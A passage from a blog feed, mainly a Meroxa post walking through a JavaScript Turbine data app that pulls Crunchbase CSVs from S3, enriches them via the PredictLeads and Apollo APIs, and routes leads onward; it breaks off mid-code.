&lt;li&gt;dispatchEvent Web API: &lt;a href=&quot;https://developer.mozilla.org/en-US/docs/Web/API/EventTarget/dispatchEvent&quot;&gt;https://developer.mozilla.org/en-US/docs/Web/API/EventTarget/dispatchEvent&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Document Object Model Events: &lt;a href=&quot;https://www.w3.org/TR/DOM-Level-2-Events/events.html&quot;&gt;https://www.w3.org/TR/DOM-Level-2-Events/events.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;QUnit: &lt;a href=&quot;https://qunitjs.com/&quot;&gt;https://qunitjs.com/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Ember: &lt;a href=&quot;http://emberjs.com&quot;&gt;emberjs.com&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Ember Test Helpers API: &lt;a href=&quot;https://github.com/emberjs/ember-test-helpers/blob/master/API.md&quot;&gt;https://github.com/emberjs/ember-test-helpers/blob/master/API.md&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;React: &lt;a href=&quot;https://reactjs.org/&quot;&gt;https://reactjs.org/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Jest: &lt;a href=&quot;https://jestjs.io/&quot;&gt;https://jestjs.io/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;@testing-library: &lt;a href=&quot;https://testing-library.com/&quot;&gt;https://testing-library.com/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Prospector: Turbine Data App for Generating Qualified Sales Leads]]></title><description><![CDATA[Using Turbine to build a data app to help source new sales leads helps small sales teams scale.]]></description><link>https://meroxa.com/blog/prospector-meroxa-turbine-data-app-for-generating-qualified-sales-leads</link><guid isPermaLink="false">https://meroxa.com/blog/prospector-meroxa-turbine-data-app-for-generating-qualified-sales-leads</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Thu, 25 Aug 2022 18:23:06 GMT</pubDate><content:encoded>&lt;p&gt;Like many early-stage startups, we are stretched thin on resources. We recently hired a VP of Sales to execute our go-to-market strategy, but we quickly realized that without dedicated SDR resources, sourcing new leads was a bottleneck.&lt;/p&gt;
&lt;p&gt;After speaking with Jamie, I realized parts of the lead generation process could be automated with a data application that wouldn’t require us to use a combination of expensive SaaS platforms. We would need to develop a way to query and search companies with specific criteria, find contact information for our ideal customer profile at the company, and send them a message. We came up with the following workflow:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Sales%20Lead%20Data%20App%20Blog%20Post_Image%201.png&quot; alt=&quot;Sales Lead Data App Blog Post_Image 1&quot;&gt;&lt;/p&gt;
&lt;p&gt;The sales team can query &lt;a href=&quot;https://crunchbase.com&quot;&gt;Crunchbase&lt;/a&gt; and export a CSV. This could be automated via their API, but that would require us to sign a pricey Enterprise agreement. Instead, the engineering team built an S3 uploader so the sales team can upload the exported CSVs to an AWS S3 bucket, where the Meroxa Turbine data app takes over. Once we have the company URL, we can query external APIs for enrichment before orchestrating the data into Salesforce. Once that is complete, we send a Slack message to notify the sales team that a new lead has been created, and then send the lead on to Postgres for additional analysis with SQL.&lt;/p&gt;
&lt;h2&gt;Show Me the Code!&lt;/h2&gt;
&lt;h3&gt;Turbine Data App Requirements&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://nodejs.org/en/download/&quot;&gt;Node JS&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://auth.meroxa.io/authorize?response_type=code&amp;#x26;client_id=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;redirect_uri=https://dashboard.meroxa.io/callback&amp;#x26;mode=signUp&amp;#x26;_ga=2.195716328.574921592.1659337186-1213117309.1659337186&quot;&gt;Meroxa account&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup/&quot;&gt;Meroxa supported PostgreSQL DB&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://aws.amazon.com/s3/&quot;&gt;AWS S3&lt;/a&gt; bucket&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://crunchbase.com&quot;&gt;Crunchbase&lt;/a&gt; account (Paid)&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://predictleads.com&quot;&gt;PredictLeads&lt;/a&gt; account (Paid)&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.apollo.io/product/api/&quot;&gt;Apollo&lt;/a&gt; (Paid)&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://salesforce.com&quot;&gt;Salesforce&lt;/a&gt; account (Paid)&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://slack.com&quot;&gt;Slack&lt;/a&gt; account&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Adding S3 and Postgres Resources to the Data Catalog with the Meroxa CLI&lt;/h3&gt;
&lt;p&gt;The first step in creating a data app is to add the S3 and PostgreSQL resources to the Meroxa catalog. Resources can be added via the dashboard, but we’re going to show you how to add them to the catalog via the CLI.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Adding S3 (&lt;/strong&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/amazon-s3&quot;&gt;docs&lt;/a&gt;&lt;strong&gt;)&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create datalake &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;  --type s3 \
  --url &quot;s3://$AWS_ACCESS_KEY:$AWS_ACCESS_SECRET@$AWS_REGION/$AWS_S3_BUCKET&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Adding Postgres (&lt;/strong&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup&quot;&gt;docs&lt;/a&gt;&lt;strong&gt;)&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create pg_db &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;  --type postgres \
  --url postgres://$PG_USER:$PG_PASS@$PG_URL:$PG_PORT/$PG_DB \
  --metadata &apos;{&quot;logical_replication&quot;:&quot;true&quot;}&apos;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If your database supports &lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/connection-types/logical-replication&quot;&gt;logical replication&lt;/a&gt;, set the metadata configuration value to &lt;code class=&quot;language-text&quot;&gt;true&lt;/code&gt;.&lt;/p&gt;
&lt;h3&gt;Initializing a Turbine JavaScript Data App&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps init prospector &lt;span class=&quot;token parameter variable&quot;&gt;--lang&lt;/span&gt; js&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;When you initialize the Turbine app, you’ll see that we include many comments and boilerplate to help you get up and running. We’ll remove most of it for this example, but take a look around, and even execute &lt;code class=&quot;language-text&quot;&gt;meroxa apps run&lt;/code&gt; to see the output of our sample app.&lt;/p&gt;
&lt;h3&gt;Cleaning the CSV data from Crunchbase&lt;/h3&gt;
&lt;p&gt;In Crunchbase, we can run searches such as finding all private, active companies that have raised a Series A in the last year. It returns a table that looks like the following:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Sales%20Lead%20Data%20App%20Blog%20Post_Image%202.png&quot; alt=&quot;Sales Lead Data App Blog Post_Image 2&quot;&gt;&lt;/p&gt;
&lt;p&gt;When we export the table to CSV, the website URL format is &lt;code class=&quot;language-text&quot;&gt;https://www.incident.io/&lt;/code&gt;. To search PredictLeads, our URL needs to be &lt;code class=&quot;language-text&quot;&gt;incident.io&lt;/code&gt; according to &lt;a href=&quot;https://docs.predictleads.com&quot;&gt;their docs&lt;/a&gt;. We need to write private functions in our Turbine app that remove the protocol (http:// or https://), the www, and the trailing slash. There is no need to set up an orchestration system (Airflow, Dagster, Prefect) or a complex stream-processing platform (Spark, Flink, et al.) to accomplish this. We can transform the URL with plain old JavaScript, as seen below.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;cleanURL&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;companyUrl&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; noProtocol &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;removeHttp&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;companyUrl&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; noWWW &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;removeWWW&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;noProtocol&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; noSlash &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;removeSlash&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;noWWW&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; noSlash&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;// Remove protocol, www, and trailing slash from URL&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;removeHttp&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; url&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;replace&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;^&lt;/span&gt;https&lt;span class=&quot;token operator&quot;&gt;?&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;\&lt;span class=&quot;token operator&quot;&gt;/&lt;/span&gt;\&lt;span class=&quot;token operator&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;removeWWW&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;noProtocol&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; noProtocol&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;replace&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token regex&quot;&gt;&lt;span class=&quot;token regex-delimiter&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;token regex-source language-regex&quot;&gt;^www\.&lt;/span&gt;&lt;span class=&quot;token regex-delimiter&quot;&gt;/&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;removeSlash&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;noWWW&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; noWWW&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;replace&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;/&lt;/span&gt;\&lt;span class=&quot;token regex&quot;&gt;&lt;span class=&quot;token regex-delimiter&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;token regex-source language-regex&quot;&gt;$&lt;/span&gt;&lt;span class=&quot;token regex-delimiter&quot;&gt;/&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
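&lt;p&gt;To sanity-check the transformation, the same logic can be exercised in isolation (condensed into a single function here so the snippet is self-contained):&lt;/p&gt;

```javascript
// Condensed version of the cleanup above: strip the protocol, the www,
// and the trailing slash in one pass.
const cleanURL = (url) =>
  url.replace(/^https?:\/\//, "").replace(/^www\./, "").replace(/\/$/, "");

console.log(cleanURL("https://www.incident.io/")); // incident.io
console.log(cleanURL("http://example.com"));       // example.com
```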
&lt;h3&gt;Searching Job Descriptions with PredictLeads&lt;/h3&gt;
&lt;p&gt;The PredictLeads API allows us to &lt;a href=&quot;https://docs.predictleads.com/#job-openings&quot;&gt;search a company’s job descriptions&lt;/a&gt;. In our case, if a company is hiring for data-specific roles (e.g. Data Engineering, Analytics Engineering), it could be a potential Meroxa customer. We send the cleaned URL to another private function, &lt;code class=&quot;language-text&quot;&gt;searchJobTitles&lt;/code&gt;, which returns an object containing the &lt;code class=&quot;language-text&quot;&gt;companyUrl&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;jobTitle&lt;/code&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;makePLRequest&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;companyUrl&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; searchTitle &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Data&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    
    &lt;span class=&quot;token keyword&quot;&gt;try&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; response &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; axios&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
        	&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;https://predictleads.com/api/v2/companies/&lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;companyUrl&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;/job_openings&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
            	&lt;span class=&quot;token literal-property property&quot;&gt;headers&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                	&lt;span class=&quot;token string-property property&quot;&gt;&quot;X-User-Email&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; process&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;PL_EMAIL&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                    &lt;span class=&quot;token string-property property&quot;&gt;&quot;X-User-Token&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; process&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;PL_TOKEN&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
        
        &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;response&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;status &lt;span class=&quot;token operator&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;200&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        	response&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;data&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;data&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;forEach&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;job&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
            	&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; jobTitle &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; job&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;attributes&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;title&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
                &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;jobTitle&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;search&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;searchTitle&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&gt;=&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                	console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; companyUrl&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; jobTitle &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
                &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;catch&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;error&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;error&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
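&lt;p&gt;The title filter itself is easy to unit-test in isolation. A minimal sketch (the helper name is hypothetical): note that &lt;code class=&quot;language-text&quot;&gt;String.prototype.search&lt;/code&gt; returns the match index, or -1 when there is no match, so a keyword at the very start of a title yields 0.&lt;/p&gt;

```javascript
// Hypothetical helper isolating the keyword filter applied to job
// titles; search() returns the match index or -1 on no match.
function matchesTitle(jobTitle, keyword) {
  return jobTitle.search(keyword) >= 0;
}

console.log(matchesTitle("Data Engineer", "Data"));       // true
console.log(matchesTitle("Senior Data Analyst", "Data")); // true
console.log(matchesTitle("Account Executive", "Data"));   // false
```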
&lt;h3&gt;Finding Contacts with Apollo&lt;/h3&gt;
&lt;p&gt;Next, we use the Apollo API to find a contact at our target company. Apollo’s API &lt;a href=&quot;https://apolloio.github.io/apollo-api-docs/?shell#organization-jobs-postings&quot;&gt;can search job postings&lt;/a&gt;, but to showcase more of the Meroxa platform, we scoped Apollo’s usage down to &lt;a href=&quot;https://apolloio.github.io/apollo-api-docs/?shell#search&quot;&gt;find contacts&lt;/a&gt;. We pass our &lt;code class=&quot;language-text&quot;&gt;companyUrl&lt;/code&gt; to the &lt;code class=&quot;language-text&quot;&gt;findIcpAtCompany&lt;/code&gt; private function, which returns the contact information:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;findIcpAtCompany&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;companyUrl&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;try&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; contactResults &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;findContactByRole&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;jobTitle&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; companyUrl&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; icpInfo &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
            &lt;span class=&quot;token literal-property property&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; contactResults&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;people&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;name&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
            &lt;span class=&quot;token literal-property property&quot;&gt;linkedinUrl&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; contactResults&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;people&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;linkedin_url&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
